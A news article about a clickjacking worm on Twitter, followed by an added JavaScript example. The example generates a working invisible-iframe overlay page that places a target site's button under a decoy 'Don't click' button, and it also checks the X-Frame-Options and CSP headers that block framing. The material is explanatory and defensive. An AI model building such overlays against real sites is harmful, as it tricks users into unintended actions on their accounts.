Twitter attack exposes awesome power of clickjacking



A worm that forced a wave of people to unintentionally broadcast messages on
microblogging site Twitter shows the potential of a vulnerability known as
clickjacking to dupe large numbers of internet users into installing malware
or visiting malicious pages without any clue they're being attacked.

The outbreak was touched off by tweets that led Twitter readers to a button
labeled "Don't click." Users who clicked the button (your reporter included)
unwittingly posted a tweet of their own advertising the same link, which
spread it to their followers. The attacks persisted even after Twitter added
countermeasures to its site and proclaimed the issue fixed.

The attack exploited a weakness at the core of the web: an attacker's page can
load a target site inside an invisible iframe and position that frame over a
visible decoy, so a click that appears to land on the decoy actually lands on a
control in the framed page (here, Twitter's button for posting a tweet). The
user sees only the decoy; nothing in the visible page hints at where the click
really goes. The so-called clickjacking exploit is pulled off by superimposing
a transparent iframe over a button or link, and any site that allows itself to
be loaded in a frame by another origin is susceptible in every major browser.
Technical details are available here.
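To make the overlay concrete, here is an added example (not from the article, not Twitter's code, and not the worm's code) in JavaScript. The first function generates the attacker's page: a visible decoy button with a transparent, higher-z-index iframe of the target shifted so that the target's real button sits exactly over the decoy. The second function is the check a tester runs before assuming a site is frameable: it inspects response headers the way a current browser does (a CSP `frame-ancestors` directive takes precedence; otherwise `X-Frame-Options DENY` or `SAMEORIGIN` blocks cross-origin framing), since refusing to be framed is the standard defence today. The function names, the sample URLs, offsets and header sets are assumptions for illustration; CSP source matching is simplified to exact origins.

```javascript
// Added example: clickjacking overlay generator plus a frameability check.
// Function names, URLs and header values are assumptions for illustration.

// Builds the attacker page. The decoy button is visible; the iframe of the
// target page is stacked above it with opacity 0, so it is invisible but still
// receives the click. offsetX/offsetY are the coordinates (within the target
// page) of the control we want the victim to hit; shifting the frame by the
// negative of those values puts that control directly over the decoy.
function buildClickjackPage({ targetUrl, offsetX, offsetY, decoyLabel }) {
  const decoyLeft = 100;
  const decoyTop = 100;
  return `<!doctype html>
<html><head><style>
  body { position: relative; }
  #decoy  { position: absolute; left: ${decoyLeft}px; top: ${decoyTop}px; z-index: 1; }
  #victim {
    position: absolute; z-index: 2;   /* stacked above the decoy */
    opacity: 0;                        /* invisible, still clickable */
    border: 0; width: 800px; height: 600px;
    left: ${decoyLeft - offsetX}px;    /* aligns target control over decoy */
    top: ${decoyTop - offsetY}px;
  }
</style></head><body>
  <button id="decoy">${decoyLabel}</button>
  <iframe id="victim" src="${targetUrl}" scrolling="no"></iframe>
</body></html>`;
}

// Decides from a target's response headers whether a page at attackerOrigin
// could frame it. Mirrors browser precedence: CSP frame-ancestors wins when
// present; otherwise X-Frame-Options applies; otherwise framing is allowed.
// Source matching is simplified to exact origins (no wildcard hosts).
function assessFrameability(headers, attackerOrigin) {
  const origin = attackerOrigin.toLowerCase();
  const get = (name) => {
    const key = Object.keys(headers).find((h) => h.toLowerCase() === name);
    return key ? String(headers[key]) : null;
  };

  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return { frameable: false, reason: "CSP frame-ancestors 'none'" };
      if (sources.includes('*')) return { frameable: true, reason: 'CSP frame-ancestors *' };
      // 'self' only covers the target's own origin, never a cross-origin attacker.
      const allowed = sources.some((s) => s !== 'self' && s === origin);
      return { frameable: allowed, reason: `CSP frame-ancestors ${sources.join(' ')}` };
    }
  }

  const xfo = get('x-frame-options');
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === 'DENY' || value === 'SAMEORIGIN') {
      return { frameable: false, reason: `X-Frame-Options ${value}` };
    }
    // Current browsers ignore unrecognized values (including the obsolete
    // ALLOW-FROM), which leaves the page frameable.
    return { frameable: true, reason: `unrecognized X-Frame-Options "${xfo}" ignored` };
  }

  return { frameable: true, reason: 'no framing restriction header' };
}

// Stand-alone demo with constructed inputs.
if (typeof require !== 'undefined' && require.main === module) {
  const page = buildClickjackPage({
    targetUrl: 'https://target.example/post',  // assumed URL
    offsetX: 300, offsetY: 200,                // assumed position of the button
    decoyLabel: "Don't click",
  });
  console.log(page);
  console.log(assessFrameability({ 'X-Frame-Options': 'DENY' }, 'https://attacker.example'));
  console.log(assessFrameability({ 'Content-Type': 'text/html' }, 'https://attacker.example'));
}
```

Run it with `node` to print the generated page and two header verdicts. In practice the offsets come from measuring the target's layout in the attacker's own browser, and the tester's first step against any real target is the header check: a `DENY`, `SAMEORIGIN` or `frame-ancestors 'none'` response means the overlay will never render the target's controls.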
